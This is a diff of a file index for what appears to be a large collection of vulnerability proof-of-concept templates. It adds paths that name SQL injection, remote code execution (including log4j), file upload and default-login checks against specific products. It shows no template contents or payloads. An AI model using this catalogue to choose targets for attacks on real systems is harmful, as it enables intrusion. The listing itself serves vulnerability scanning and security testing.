 ./poc/local_file_inclusion/zendrop-dropshipping-and-fulfillment-d55b65118444e2b38ff7422e4f9db780.yaml
 ./poc/local_file_inclusion/zendrop-dropshipping-and-fulfillment.yaml
@@ -58987,6 +59079,7 @@
 ./poc/microsoft/74cms-sqli.yaml
 ./poc/microsoft/74cms-sqli.yml
 ./poc/microsoft/74cms-v3-Boolean-injection.yaml
+./poc/microsoft/74cms-weixin-sqli.yaml
 ./poc/microsoft/74cms-workflow.yaml
 ./poc/microsoft/74cms-xss.yaml
 ./poc/microsoft/74cms.yaml
@@ -59192,6 +59285,7 @@
 ./poc/microsoft/block-styler-for-gravity-forms-322a86f28cc5049106653fa64c408640.yaml
 ./poc/microsoft/block-styler-for-gravity-forms-6477bf18cad6c823db485408d49b337b.yaml
 ./poc/microsoft/block-styler-for-gravity-forms.yaml
+./poc/microsoft/bloofoxcms-default-login.yaml
 ./poc/microsoft/bloofoxcms-login-panel.yaml
 ./poc/microsoft/bloofoxcms.yaml
 ./poc/microsoft/bolt-cms-detect-759.yaml
@@ -60975,6 +61069,7 @@
 ./poc/microsoft/zzcms-zsmanage-sqli.yaml
 ./poc/microsoft/zzcms-zsmanage-sqli.yml
 ./poc/microsoft/zzcms.yaml
+./poc/microsoft/zzzcms-info-disclosure.yaml
 ./poc/microsoft/zzzcms-parser-search-rce.yaml
 ./poc/microsoft/zzzcms-ssrf.yaml
 ./poc/microsoft/zzzcms-workflow.yaml
@@ -61056,6 +61151,7 @@
 ./poc/mysql/mysql-detect.yaml
 ./poc/mysql/mysql-dump-files.yaml
 ./poc/mysql/mysql-empty-password.yaml
+./poc/mysql/mysql-history.yaml
 ./poc/mysql/mysql-info.yaml
 ./poc/mysql/mysql-load-file.yaml
 ./poc/mysql/mysql-my-cnf-disclosure.yaml
@@ -61074,6 +61170,7 @@
 ./poc/mysql/seeyon-a6-createmysql-disclosure.yaml
 ./poc/mysql/seeyon-oa-a6-createmysql-infoleak.yaml
 ./poc/mysql/unrestricted-sg-ingress-mysql-port.yaml
+./poc/mysql/weaver-mysql-config-info-leak.yaml
 ./poc/netlify/api-netlify-470.yaml
 ./poc/netlify/api-netlify.yaml
 ./poc/netlify/netlify-cms-9039.yaml
@@ -61271,6 +61368,7 @@
 ./poc/nodejs/node-red-workflow.yaml
 ./poc/nodejs/nodebb-installer.yaml
 ./poc/nodejs/nodebb.yaml
+./poc/nodejs/nodered-default-login.yaml
 ./poc/nodejs/npm-access-token.yaml
 ./poc/nodejs/npm-accesstoken.yaml
 ./poc/nodejs/npm-anonymous-cli.yaml
@@ -62020,6 +62118,7 @@
 ./poc/oracle/oracle-xdb.yaml
 ./poc/oracle/oracledomparser_xxeinjection.yaml
 ./poc/oracle/unrestricted-sg-ingress-oracledb-port.yaml
+./poc/oracle/xss-oracle.yaml
 ./poc/other/.appveyor.yml
 ./poc/other/.build.yml
 ./poc/other/.cent.yaml
@@ -62063,6 +62162,8 @@
 ./poc/other/12-step-meeting-list-4bf07d1e5a2f794295c15f8f757f40ac.yaml
 ./poc/other/12-step-meeting-list-86c3c84e57dc131c9759740a5975073a.yaml
 ./poc/other/12-step-meeting-list.yaml
+./poc/other/12.1.1.2.yaml
+./poc/other/12.1.1.yaml
 ./poc/other/123-chat-videochat-1050a0dc63f69ad77a3b1dd0233cad1d.yaml
 ./poc/other/123-chat-videochat.yaml
 ./poc/other/13.2.1.yaml
@@ -62232,6 +62333,8 @@
 ./poc/other/5-stars-rating-funnel-ca8cc39bb5282914f877821d87c76a75.yaml
 ./poc/other/5-stars-rating-funnel-f029167d475980fa5bee5bdd21328b34.yaml
 ./poc/other/5-stars-rating-funnel.yaml
+./poc/other/5.1.5.yaml
+./poc/other/5.3.3.1.yaml
 ./poc/other/50 - T15.yml
 ./poc/other/51 - T16.yml
 ./poc/other/52 - T17.yml
@@ -62268,9 +62371,11 @@
 ./poc/other/7moor-product.yaml
 ./poc/other/8-degree-notification-bar-c67319f4154995b42b270dcd686df733.yaml
 ./poc/other/8-degree-notification-bar.yaml
+./poc/other/8.2.1.yaml
 ./poc/other/823623832.yaml
 ./poc/other/834385017.yaml
 ./poc/other/845713912.yaml
+./poc/other/9.1.2.yaml
 ./poc/other/9.1.3.yaml
 ./poc/other/99fy-core-a3f784c81b664fa5a625984725c83e0b.yaml
 ./poc/other/99fy-core.yaml
@@ -63428,6 +63533,7 @@
 ./poc/other/advanced-ajax-page-loader-94b986ce02c9c2e3c3d960667cb1b92d.yaml
 ./poc/other/advanced-ajax-page-loader.yaml
 ./poc/other/advanced-backgrounds-7eca2ce569a1f864194b199d672f550a.yaml
+./poc/other/advanced-backgrounds.yaml
 ./poc/other/advanced-booking-calendar-14ec1d72b66e6743ab3b4dce700bdfbf.yaml
 ./poc/other/advanced-booking-calendar-1a2ee554af2bac4ad469ee7bed611a9a.yaml
 ./poc/other/advanced-booking-calendar-1b2f93fedafab9000d6f605166dac9f8.yaml
@@ -64088,6 +64194,7 @@
 ./poc/other/ambience-theme.yaml
 ./poc/other/ambience.yaml
 ./poc/other/ambuf-onlineexam.yaml
+./poc/other/amcharts-charts-and-maps-4b370fcafcc0619a561d13639d3f142f.yaml
 ./poc/other/amcharts-charts-and-maps-f9da8d5aebda9e4941fa4c6545224d1a.yaml
 ./poc/other/amcharts-charts-and-maps.yaml
 ./poc/other/ameblo.yaml
@@ -66102,6 +66209,7 @@
 ./poc/other/booked-52f10f5b00d5b865f3ec1d35a09bc8c7.yaml
 ./poc/other/booked-cc63b18b15f6ecc630ccd836a52175c4.yaml
 ./poc/other/booked-d41d8cd98f00b204e9800998ecf8427e.yaml
+./poc/other/booked-export-csv.yaml
 ./poc/other/booked-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/booked-plugin.yaml
 ./poc/other/booked.yaml
@@ -67072,6 +67180,7 @@
 ./poc/other/calculator-builder.yaml
 ./poc/other/calculatorpro-calculators-ca0cbf3c8d45825c30255a3139df50c2.yaml
 ./poc/other/calculatorpro-calculators.yaml
+./poc/other/caldera-c2.yaml
 ./poc/other/calendar-16959bb7a77786fa99adf23cd6bcb3b8.yaml
 ./poc/other/calendar-1b136725c08c20abf79c4380e79bcff6.yaml
 ./poc/other/calendar-booking-830a27ef52874c6842aa01d3d38a46c5.yaml
@@ -68692,6 +68801,7 @@
 ./poc/other/connections-plugin.yaml
 ./poc/other/connections.yaml
 ./poc/other/connectwise-panel.yaml
+./poc/other/connectwise-setup.yaml
 ./poc/other/consensu-io-959ddc02bf7e20889ee3e75bce04f1df.yaml
 ./poc/other/consensu-io.yaml
 ./poc/other/construct-08675bcc1f60477d714acb4400b3b900.yaml
@@ -70499,6 +70609,7 @@
 ./poc/other/discourse.yaml
 ./poc/other/discusselasticco.yaml
 ./poc/other/discuz-info-admincp.yaml
+./poc/other/discuz-panel.yaml
 ./poc/other/discuz-wooyun-2010-080723.yaml
 ./poc/other/discuz-wooyun-2010-080723.yml
 ./poc/other/discuz.yaml
@@ -72452,6 +72563,7 @@
 ./poc/other/esplanade-theme-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/esplanade-theme.yaml
 ./poc/other/esplanade.yaml
+./poc/other/espocrm-installer.yaml
 ./poc/other/esri-arcgis.yaml
 ./poc/other/essence-2f388ea9e9ab48631b96ab46d4bcca71.yaml
 ./poc/other/essence-a560a32e5476f30f563c8e474855b204.yaml
@@ -75387,6 +75499,7 @@
 ./poc/other/gravatar.yaml
 ./poc/other/gravitate-qa-tracker.yaml
 ./poc/other/graylog-log4j.yaml
+./poc/other/graylog-panel.yaml
 ./poc/other/graylog.yaml
 ./poc/other/great-quotes-b9ff6fdd55a9b22b32ddac6bebb6e805.yaml
 ./poc/other/great-quotes.yaml
@@ -75599,6 +75712,7 @@
 ./poc/other/h2csmuggle-nuclei.yaml
 ./poc/other/h2csmuggle-upgrade-only-nuclei.yaml
 ./poc/other/h2o-arbitary-file-read.yaml
+./poc/other/h2o-dashboard.yaml
 ./poc/other/h2o.yaml
 ./poc/other/h3c secpath 运维审计系统.yaml
 ./poc/other/h3c-cas.yaml
@@ -78064,6 +78178,7 @@
 ./poc/other/knowledgebase-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/knowledgebase-plugin.yaml
 ./poc/other/knowledgebase.yaml
+./poc/other/knowledgetree-installer.yaml
 ./poc/other/knowyourmeme.yaml
 ./poc/other/ko-fi-button-9325aa24d072619f5651560e247384bb.yaml
 ./poc/other/ko-fi-button.yaml
@@ -78490,6 +78605,7 @@
 ./poc/other/learnpress-564a9fb7cfea0ff2a45b7867a4ae2fd9.yaml
 ./poc/other/learnpress-5795dae947d75ff28803638f0fc808ab.yaml
 ./poc/other/learnpress-5be47a6f6a60b58d052fb7558c0b50fb.yaml
+./poc/other/learnpress-5c26a1848cda845d9b97374472d49eb0.yaml
 ./poc/other/learnpress-651bdfd7a126bd5ba04664d29f615821.yaml
 ./poc/other/learnpress-6b539e5bab49bc636b25cfa2bb0f6104.yaml
 ./poc/other/learnpress-6e9f6f17e6084384ef692acb669a8185.yaml
@@ -78520,6 +78636,7 @@
 ./poc/other/learnpress-eedaa6c99930b98ac9d187c905349bd2.yaml
 ./poc/other/learnpress-f0b30b3fe06ed749ddc5c1c74c0c46f3.yaml
 ./poc/other/learnpress-f707cb8bb04eb6ac82ddeb976e9566e3.yaml
+./poc/other/learnpress-fcb8158f71307795525b9840bda82742.yaml
 ./poc/other/learnpress-import-export-4808c4733291625aebcafcb739998352.yaml
 ./poc/other/learnpress-import-export-781d3d408316c6ba4e0dfff74447c45e.yaml
 ./poc/other/learnpress-import-export-8ff6c53fc75f54a14303014a2c8a1705.yaml
@@ -82271,6 +82388,7 @@
 ./poc/other/order-your-posts-manually.yaml
 ./poc/other/orderbook.yaml
 ./poc/other/ordermanagementsystem.yaml
+./poc/other/ords-panel.yaml
 ./poc/other/orenosv.yaml
 ./poc/other/organization-chart-9be13731d7f139bf1e66987b076421d6.yaml
 ./poc/other/organization-chart-b7c6ef6c9a597e5f8be1545eff498dc5.yaml
@@ -86959,6 +87077,7 @@
 ./poc/other/shared-files-b60883826b013ff1012dfe97579b11c9.yaml
 ./poc/other/shared-files.yaml
 ./poc/other/sharefile-panel.yaml
+./poc/other/sharefile-storage-server.yaml
 ./poc/other/sharefile_storage_zones_controller.yaml
 ./poc/other/sharethis-share-buttons-9e60d2ab07fe70880c141c626be14dfc.yaml
 ./poc/other/sharethis-share-buttons.yaml
@@ -88451,6 +88570,7 @@
 ./poc/other/sp-rental-manager.yaml
 ./poc/other/spa-and-salon-d8dec93d7693bf22caf0cca4ae5f7f42.yaml
 ./poc/other/spa-and-salon.yaml
+./poc/other/spa-cart-installer.yaml
 ./poc/other/spacelogic-cbus-panel.yaml
 ./poc/other/spacelogic_c-bus_home_controller_firmware.yaml
 ./poc/other/spacer-075ae38a8c1da7cb621b2b71cac6674e.yaml
@@ -90468,6 +90588,7 @@
 ./poc/other/tongda-OA.yaml
 ./poc/other/tongda-oa.yaml
 ./poc/other/tongda-v2017-video-file-file-read.yaml
+./poc/other/tongda-video-file-read.yaml
 ./poc/other/tongda-workflow.yaml
 ./poc/other/toolbar-extras-6f3392582979e59d1ae0fbfcb1420605.yaml
 ./poc/other/toolbar-extras.yaml
@@ -92849,6 +92970,7 @@
 ./poc/other/weaverx-theme-support.yaml
 ./poc/other/wechat-broadcast-a8c47569a83f534b44638d64efb76d6d.yaml
 ./poc/other/wechat-broadcast.yaml
+./poc/other/wechat-info-leak.yaml
 ./poc/other/wechat-reward-7f155dfe1d3cce8791fd074724b6b008.yaml
 ./poc/other/wechat-reward.yaml
 ./poc/other/wedevs-project-manager-14963541d2314ab58423512ed4bb3c81.yaml
@@ -94342,8 +94464,10 @@
 ./poc/other/yonyou-intelligentplant.yaml
 ./poc/other/yonyou-ism.yaml
 ./poc/other/yonyou-ksoa.yaml
+./poc/other/yonyou-nc-baseapp-deserialization.yaml
 ./poc/other/yonyou-nc-cloud.yaml
 ./poc/other/yonyou-nc-downcourseware-file-read.yaml
+./poc/other/yonyou-nc-info-leak.yaml
 ./poc/other/yonyou-nc-uapws-xml-fileread.yaml
 ./poc/other/yonyou-nc-workflow.yaml
 ./poc/other/yonyou-rmis.yaml
@@ -95096,6 +95220,7 @@
 ./poc/php/cryptographp-db0995fcce0b587938843ee9f532e46f.yaml
 ./poc/php/cryptographp.yaml
 ./poc/php/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml
+./poc/php/custom-css-js-php.yaml
 ./poc/php/default-cakephp-page.yaml
 ./poc/php/douphp.yaml
 ./poc/php/drupal_module-acl-arbitrary-php-code-execution.yaml
@@ -95279,6 +95404,7 @@
 ./poc/php/phpfox.yaml
 ./poc/php/phpfreechat-48a23c4f9c3626791edc2518ad66ffc9.yaml
 ./poc/php/phpfreechat.yaml
+./poc/php/phpgedview-installer.yaml
 ./poc/php/phpinfo-1.yaml
 ./poc/php/phpinfo-10.yaml
 ./poc/php/phpinfo-11.yaml
@@ -95314,6 +95440,7 @@
 ./poc/php/phpldapadmin-panel.yaml
 ./poc/php/phpldapadmin-xss.yaml
 ./poc/php/phpldapadmin.yaml
+./poc/php/phplist-detect.yaml
 ./poc/php/phplist-邮件系统.yaml
 ./poc/php/phplist.yaml
 ./poc/php/phpmemcached-admin-panel.yaml
@@ -95408,6 +95535,7 @@
 ./poc/php/phpstudy.yaml
 ./poc/php/phpsword-favicon-manager-7f890c6483fca4d34ecced25fbeb779a.yaml
 ./poc/php/phpsword-favicon-manager.yaml
+./poc/php/phpsys-info.yaml
 ./poc/php/phpsysinfo.yaml
 ./poc/php/phpunit-9555.yaml
 ./poc/php/phpunit-9556.yaml
@@ -96073,6 +96201,8 @@
 ./poc/remote_code_execution/cisco-cloudcenter-suite-log4j-rce.yaml
 ./poc/remote_code_execution/cisco-cloudcenter-suite-rce.yaml
 ./poc/remote_code_execution/cisco-rv-series-rce.yaml
+./poc/remote_code_execution/cisco-webex-log4j-rce.yaml
+./poc/remote_code_execution/citrix-xenapp-log4j-rce.yaml
 ./poc/remote_code_execution/clearpay-gateway-for-woocommerce-450f3fa1fdfaa0d436f04229a0397315.yaml
 ./poc/remote_code_execution/clearpay-gateway-for-woocommerce-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/remote_code_execution/clearpay-gateway-for-woocommerce-e712c3dafb88df20f5fadf366f459639.yaml
@@ -96569,7 +96699,9 @@
 ./poc/remote_code_execution/first-order-discount-woocommerce.yaml
 ./poc/remote_code_execution/flexible-woocommerce-checkout-field-editor-c19aa259446a2160cebff3bedcae8458.yaml
 ./poc/remote_code_execution/flexible-woocommerce-checkout-field-editor.yaml
+./poc/remote_code_execution/flexnet-log4j-rce.yaml
 ./poc/remote_code_execution/flink-upload-rce.yaml
+./poc/remote_code_execution/flir-ax8-rce.yaml
 ./poc/remote_code_execution/flir-ax8-res-php-rce.yaml
 ./poc/remote_code_execution/focus-on-reviews-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml
 ./poc/remote_code_execution/focus-on-reviews-for-woocommerce-ff9293ba28748efa2ab9a2fe77385468.yaml
@@ -96861,6 +96993,7 @@
 ./poc/remote_code_execution/mailchimp-for-woocommerce.yaml
 ./poc/remote_code_execution/makecommerce-d64de48280006e9db4915008aca3501d.yaml
 ./poc/remote_code_execution/makecommerce.yaml
+./poc/remote_code_execution/manage-engine-dc-log4j-rce.yaml
 ./poc/remote_code_execution/map-location-picker-at-checkout-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml
 ./poc/remote_code_execution/map-location-picker-at-checkout-for-woocommerce-ce939a1f42ea4be90a3ab67bfaa89137.yaml
 ./poc/remote_code_execution/map-location-picker-at-checkout-for-woocommerce-f5d45261d904c761470f6018132e92c5.yaml
@@ -97008,6 +97141,7 @@
 ./poc/remote_code_execution/opencpu-rce.yaml
 ./poc/remote_code_execution/opendreambox-webadmin-rce.yaml
 ./poc/remote_code_execution/opennms-log4j-jndi-rce.yaml
+./poc/remote_code_execution/openshift-log4j-rce.yaml
 ./poc/remote_code_execution/opensns-rce-1.yaml
 ./poc/remote_code_execution/opensns-rce-2.yaml
 ./poc/remote_code_execution/opensns-rce-9320.yaml
@@ -97070,6 +97204,7 @@
 ./poc/remote_code_execution/panabit-sy_addmount-rce.yaml
 ./poc/remote_code_execution/pandorafms-cve-2019-20224-rce.yaml
 ./poc/remote_code_execution/pandorafms-cve-2019-20224-rce.yml
+./poc/remote_code_execution/papercut-log4j-rce.yaml
 ./poc/remote_code_execution/parcel-tracker-ecourier-102353dc8e1f02661d6e7f970ee16c34.yaml
 ./poc/remote_code_execution/parcel-tracker-ecourier-1fbda1a354e4e1e6f5f905808cc4736f.yaml
 ./poc/remote_code_execution/parcel-tracker-ecourier-4e97cd21a484b6166595c229339c2254.yaml
@@ -97427,6 +97562,7 @@
 ./poc/remote_code_execution/ruijie-networks-rce-9948.yaml
 ./poc/remote_code_execution/ruijie-networks-rce-9949.yaml
 ./poc/remote_code_execution/ruijie-networks-rce.yaml
+./poc/remote_code_execution/ruijie-nmc-sync-rce.yaml
 ./poc/remote_code_execution/ruijie-rg-eg-web-mis-rce.yaml
 ./poc/remote_code_execution/ruijie-rg-uac-rce.yaml
 ./poc/remote_code_execution/ruijie-uac-remote-rce.yaml
@@ -97699,6 +97835,7 @@
 ./poc/remote_code_execution/swipehq-payment-gateway-woocommerce.yaml
 ./poc/remote_code_execution/swipehq-payment-gateway-wp-e-commerce-443842d1d8712ea7662492da3baca3c2.yaml
 ./poc/remote_code_execution/swipehq-payment-gateway-wp-e-commerce.yaml
+./poc/remote_code_execution/symantec-sepm-log4j-rce.yaml
 ./poc/remote_code_execution/symfonyrce(1).yaml
 ./poc/remote_code_execution/symfonyrce.yaml
 ./poc/remote_code_execution/sync-ecommerce-neo-6477bf18cad6c823db485408d49b337b.yaml
@@ -97780,6 +97917,7 @@ ./poc/remote_code_execution/tomcat-cve-2017-12615-rce.yml ./poc/remote_code_execution/tomcat-manager-bruteforce.yaml ./poc/remote_code_execution/tongda-gateway-rce.yaml +./poc/remote_code_execution/tongda-getdata-rce.yaml ./poc/remote_code_execution/tongda-oa-dologin-rce.yaml ./poc/remote_code_execution/tongda-oa-v11-9-getdata-rce.yaml ./poc/remote_code_execution/tongda-v11-getdata-rce.yaml @@ -97879,6 +98017,7 @@ ./poc/remote_code_execution/wavlnk_router_rce.yaml ./poc/remote_code_execution/wc-customer-source-3baa6cc7c9b97bdb322dbcfa3bb0f658.yaml ./poc/remote_code_execution/wc-customer-source.yaml +./poc/remote_code_execution/weaver-ecology-bshservlet-rce.yaml ./poc/remote_code_execution/weaver_e_mobile_6_rce.yaml ./poc/remote_code_execution/webappick-pdf-invoice-for-woocommerce-55347e9ac58126992d50d45693e54288.yaml ./poc/remote_code_execution/webappick-pdf-invoice-for-woocommerce-621a86ac69fc43f58c97e1a34ee9115f.yaml @@ -98443,6 +98582,7 @@ ./poc/remote_code_execution/woocommerce-pdf-vouchers-f2e20e333c1c84b75ca0fcb1020fa3d0.yaml ./poc/remote_code_execution/woocommerce-pdf-vouchers.yaml ./poc/remote_code_execution/woocommerce-photo-reviews-8eabd8f3601428e7f9c625d55482bc6c.yaml +./poc/remote_code_execution/woocommerce-photo-reviews.yaml ./poc/remote_code_execution/woocommerce-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/woocommerce-plugin.yaml ./poc/remote_code_execution/woocommerce-pos-c5391e8d69ffbd0565b5ecdd695e1050.yaml 
@@ -98770,6 +98910,7 @@ ./poc/remote_code_execution/wp-infusionsoft-woocommerce-e2b56e01ba06c66b8d53d40581b73ce6.yaml ./poc/remote_code_execution/wp-infusionsoft-woocommerce.yaml ./poc/remote_code_execution/wp-kadence-blocks-rce.yaml +./poc/remote_code_execution/wp-social-warfare-rce.yaml ./poc/remote_code_execution/wp-source-control-1c031a30792c8eeff23b48219d4181d7.yaml ./poc/remote_code_execution/wp-source-control.yaml ./poc/remote_code_execution/wp-woo-commerce-sync-for-g-sheet-6477bf18cad6c823db485408d49b337b.yaml @@ -99142,6 +99283,7 @@ ./poc/remote_code_execution/yonyou-nc-bshservlet-rce.yaml ./poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml ./poc/remote_code_execution/yonyou-nc-cloud-rce.yaml +./poc/remote_code_execution/yonyou-nc-ncmessageservlet-rce.yaml ./poc/remote_code_execution/yonyou-nc-servlet-upload-rce.yaml ./poc/remote_code_execution/yonyou_nc_getdatasourceconfig_unauthorized.yaml ./poc/remote_code_execution/yonyou_nc_jsinvoke_rce.yaml @@ -99550,6 +99692,7 @@ ./poc/search/elasticsearch-cve-2015-3337-lfi.yml ./poc/search/elasticsearch-cve-2015-5531.yaml ./poc/search/elasticsearch-cve-2015-5531.yml +./poc/search/elasticsearch-default-login.yaml ./poc/search/elasticsearch-insecure-default-config.yaml ./poc/search/elasticsearch-log4j.yaml ./poc/search/elasticsearch-sql-client-detect-7189.yaml @@ -101140,6 +101283,7 @@ ./poc/social/wp-social-invitations.yaml ./poc/social/wp-social-sharing-eda59f81748daf05c10fe49d04ee8954.yaml ./poc/social/wp-social-sharing.yaml +./poc/social/wp-social-warfare-rce.yaml ./poc/social/wp-social-widget-99c69545759f5e9561e2866256c68f33.yaml ./poc/social/wp-social-widget-d7b289a4844fbc5f1814a16ab030f4b4.yaml ./poc/social/wp-social-widget.yaml @@ -101203,6 +101347,7 @@ ./poc/sql/74cms-sqli-9.yaml ./poc/sql/74cms-sqli.yaml ./poc/sql/74cms-sqli.yml +./poc/sql/74cms-weixin-sqli.yaml ./poc/sql/74cms_V3-plusa-sqli.yaml ./poc/sql/74cms_v4-register-sqli.yaml ./poc/sql/AMSS-sqli.yaml 
@@ -103094,6 +103239,7 @@ ./poc/sql/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml ./poc/sql/CVE-2024-8325-11327d2b9e1fdbe3b095a728909b8615.yaml ./poc/sql/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml +./poc/sql/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml ./poc/sql/Changdao-165-SQLi.yaml ./poc/sql/Cmseasy-Http-Head-sqli.yaml ./poc/sql/Cmseasy-celive-sqli.yaml @@ -103278,6 +103424,7 @@ ./poc/sql/PbootCMS-search-SQL.yaml ./poc/sql/Qibocms-SQLi.yaml ./poc/sql/SQLInjection_ERROR.yaml +./poc/sql/SQLNet-log.yaml ./poc/sql/SQL_injection-Authentification.yaml ./poc/sql/SQL_injection-Error.yaml ./poc/sql/SQL_injection-Numeric.yaml @@ -104602,6 +104749,7 @@ ./poc/sql/ecology-loginSSO-sql-CNVD-2021-33202.yaml ./poc/sql/ecology-oa-FileDownloadForOutDoc-sqli.yaml ./poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml +./poc/sql/ecology-oa-file-sqli.yaml ./poc/sql/ecology-oa-filedownloadforoutdoc-sqli.yaml ./poc/sql/ecology-sqli2.yaml ./poc/sql/ecology-syncuserinfo-sqli-7176.yaml @@ -105755,6 +105903,7 @@ ./poc/sql/mysql-detect.yaml ./poc/sql/mysql-dump-files.yaml ./poc/sql/mysql-empty-password.yaml +./poc/sql/mysql-history.yaml ./poc/sql/mysql-info.yaml ./poc/sql/mysql-load-file.yaml ./poc/sql/mysql-my-cnf-disclosure.yaml @@ -105857,6 +106006,7 @@ ./poc/sql/odoo-database-manager-9204.yaml ./poc/sql/odoo-database-manager-9205.yaml ./poc/sql/odoo-database-manager.yaml +./poc/sql/odoo-unprotected-database.yaml ./poc/sql/off-canvas-sidebars-6ad11d341ff184481eedb5b9451b7483.yaml ./poc/sql/official-mailerlite-sign-up-forms-6707baefec25107b95f6524fdb5e747c.yaml ./poc/sql/olive-one-click-demo-import-969f79d83aae53a4cdb4fc966dc1c19e.yaml @@ -106981,6 +107131,7 @@ ./poc/sql/tmdb.yaml ./poc/sql/tongda-delete-seal-sqli.yaml ./poc/sql/tongda-insert-sql-inject-getshell.yaml +./poc/sql/tongda-insert-sqli.yaml ./poc/sql/tongda-oa-auth-sql.yaml ./poc/sql/tongda-oa-general-handle-form-sqli.yaml ./poc/sql/tongda-oa-general-system-seal-manage-unauth-sqli.yaml 
@@ -106999,6 +107150,7 @@ ./poc/sql/tongda-oa-v11-6-insert-sqli.yaml ./poc/sql/tongda-oa-v11-6-report-bi-sqli.yaml ./poc/sql/tongda-report-bi-func-sql-inject.yaml +./poc/sql/tongda-report-func-sqli.yaml ./poc/sql/tongda-sqli.yaml ./poc/sql/tongda-swfupload-new-sql-inject.yaml ./poc/sql/tongda_oa_get_datas_sqli.yaml @@ -107276,8 +107428,12 @@ ./poc/sql/wd-facebook-feed-6856e6f571b9e2dba73efb4f64b1586a.yaml ./poc/sql/wd-facebook-feed-692e628db2f9602b334156cb9fc72ee5.yaml ./poc/sql/weather-atlas-dfb9db424f295d9c4146acfe38e9fa83.yaml +./poc/sql/weaver-checkserver-sqli.yaml +./poc/sql/weaver-ecology-getsqldata-sqli.yaml +./poc/sql/weaver-ecology-hrmcareer-sqli.yaml ./poc/sql/weaver-ecology-workflowservicexml-sqli.yaml ./poc/sql/weaver-group-xml-sqli.yaml +./poc/sql/weaver-mysql-config-info-leak.yaml ./poc/sql/weaver_e_cology9_SQL.yaml ./poc/sql/weaver_eoffice_init_sqli.yaml ./poc/sql/weaverx-theme-support-db33413f81b981a56a44cbdf82e1f45f.yaml @@ -108228,6 +108384,7 @@ ./poc/sql_injection/74cms-sqli-9.yaml ./poc/sql_injection/74cms-sqli.yaml ./poc/sql_injection/74cms-sqli.yml +./poc/sql_injection/74cms-weixin-sqli.yaml ./poc/sql_injection/74cms_V3-plusa-sqli.yaml ./poc/sql_injection/74cms_v4-register-sqli.yaml ./poc/sql_injection/AMSS-sqli.yaml @@ -108431,6 +108588,7 @@ ./poc/sql_injection/PbootCMS-search-SQL.yaml ./poc/sql_injection/Qibocms-SQLi.yaml ./poc/sql_injection/SQLInjection_ERROR.yaml +./poc/sql_injection/SQLNet-log.yaml ./poc/sql_injection/SQL_injection-Authentification.yaml ./poc/sql_injection/SQL_injection-Error.yaml ./poc/sql_injection/SQL_injection-Numeric.yaml 
@@ -108589,6 +108747,7 @@ ./poc/sql_injection/ecology-loginSSO-sql-CNVD-2021-33202.yaml ./poc/sql_injection/ecology-oa-FileDownloadForOutDoc-sqli.yaml ./poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml +./poc/sql_injection/ecology-oa-file-sqli.yaml ./poc/sql_injection/ecology-oa-filedownloadforoutdoc-sqli.yaml ./poc/sql_injection/ecology-sqli2.yaml ./poc/sql_injection/ecology-syncuserinfo-sqli-7176.yaml @@ -108772,6 +108931,7 @@ ./poc/sql_injection/mysql-detect.yaml ./poc/sql_injection/mysql-dump-files.yaml ./poc/sql_injection/mysql-empty-password.yaml +./poc/sql_injection/mysql-history.yaml ./poc/sql_injection/mysql-info.yaml ./poc/sql_injection/mysql-load-file.yaml ./poc/sql_injection/mysql-my-cnf-disclosure.yaml @@ -108979,6 +109139,7 @@ ./poc/sql_injection/time_sql_peremeter.yaml ./poc/sql_injection/tongda-delete-seal-sqli.yaml ./poc/sql_injection/tongda-insert-sql-inject-getshell.yaml +./poc/sql_injection/tongda-insert-sqli.yaml ./poc/sql_injection/tongda-oa-auth-sql.yaml ./poc/sql_injection/tongda-oa-general-handle-form-sqli.yaml ./poc/sql_injection/tongda-oa-general-system-seal-manage-unauth-sqli.yaml @@ -108997,6 +109158,7 @@ ./poc/sql_injection/tongda-oa-v11-6-insert-sqli.yaml ./poc/sql_injection/tongda-oa-v11-6-report-bi-sqli.yaml ./poc/sql_injection/tongda-report-bi-func-sql-inject.yaml +./poc/sql_injection/tongda-report-func-sqli.yaml ./poc/sql_injection/tongda-sqli.yaml ./poc/sql_injection/tongda-swfupload-new-sql-inject.yaml ./poc/sql_injection/tongda_oa_get_datas_sqli.yaml 
@@ -109039,8 +109201,12 @@ ./poc/sql_injection/wanhuOA-sqli-savePersonInfo.yaml ./poc/sql_injection/wanhu_ezoffice_SendFileCheckTemplateEdit_sqli.yaml ./poc/sql_injection/wanhuoa_ezoffice_aiframe_sqli.yaml +./poc/sql_injection/weaver-checkserver-sqli.yaml +./poc/sql_injection/weaver-ecology-getsqldata-sqli.yaml +./poc/sql_injection/weaver-ecology-hrmcareer-sqli.yaml ./poc/sql_injection/weaver-ecology-workflowservicexml-sqli.yaml ./poc/sql_injection/weaver-group-xml-sqli.yaml +./poc/sql_injection/weaver-mysql-config-info-leak.yaml ./poc/sql_injection/weaver_e_cology9_SQL.yaml ./poc/sql_injection/weaver_eoffice_init_sqli.yaml ./poc/sql_injection/wecrm-SmsDataList-sqli.yaml @@ -110453,10 +110619,13 @@ ./poc/upload/wanhu-smartUpload-fileupload.yaml ./poc/upload/wanhu_ezoffice_fileUpload_controller_upload.yaml ./poc/upload/weaver-ecology-ktreeuploadaction-file-upload.yaml +./poc/upload/weaver-eoffice-file-upload.yaml ./poc/upload/weaver-jquery-file-upload.yaml +./poc/upload/weaver-ktreeuploadaction-file-upload.yaml ./poc/upload/weaver-lazyuploadify-file-upload.yaml ./poc/upload/weaver-office-server-file-upload.yaml ./poc/upload/weaver-uploadify-file-upload.yaml +./poc/upload/weaver-uploadoperation-file-upload.yaml ./poc/upload/weaver_e_office9_upload.yaml ./poc/upload/webservice_upload.yaml ./poc/upload/webservice_upload2.yaml @@ -110534,6 +110703,7 @@ ./poc/upload/wp-file-uploader-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/upload/wp-file-uploader-plugin.yaml ./poc/upload/wp-file-uploader.yaml 